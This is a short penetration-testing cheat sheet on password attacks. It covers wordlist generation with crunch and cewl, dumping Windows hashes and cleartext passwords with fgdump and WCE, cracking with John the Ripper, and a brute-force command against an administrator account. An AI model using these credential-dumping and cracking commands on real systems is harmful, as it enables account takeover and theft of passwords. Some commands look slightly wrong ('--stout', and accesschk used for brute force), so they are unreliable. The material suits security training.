# Password Attacks

## Password Attacks are based on: 

1. Guess
2. Brute-force
3. Dictionary

### Crunch 

```
man crunch 
ls -la /usr/share/crunch/charset.lst 

crunch 6 6 0123456789ABCDEF -o list.txt 
# Create a file of passwords 6 characters long using 0-F and save it to a file 

crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha -o mixedalpha.txt 
# 4 character passwords using pre-defined crunch list 

crunch 8 8 -t ,@@^^%%% |more 
# Similar to Abc$#123, Jud()666, Hol&&278 passwords
```

### PWdump/FGdump 

You need to have admin access to run those two commands. 

```
fgdump.exe 
# Run it. Dumps the hashes to a file to be used and cracked later 

type 127.0.0.1.pwdump 
# Access the contents of the file generated from fgdump.exe command
```

### WCE (Windows Credential Editor) 

Need admin access. 

```
wce64.exe -w 
# Run it. Dumps password in clear text
```

### John the Ripper 

```
john hashes.txt 
# Run it. Cracks the hash passwords on Kali Linux using dictionary brute-force attack(MAY TAKE LONG) 
```

### Password Profiling 

Using word/phrases for organisation and include them in our wordlist (e.g 33 Company uses thirtythree password combinations) 

```
Tool: cewl Create passwords from words/phrases

cewl www.domain.com -m 6 -w /root/domain-cel.txt 
# Will create a password txt for the domain
```

In combination with John the Ripper 

```
vi /etc/john/john.conf 
(ADD) $[0-9]$[0-9] 
john --wordlist=megacorp-cewl.txt --rules --stout > mutated.txt
```

### Brute force password attack on administrator. 

```
accesschk -v -t 10.10.10.10 -u administrator -P /usr/share/dirb/wordlists/common.txt
```

### Reference 

{% embed url="<http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats>" %}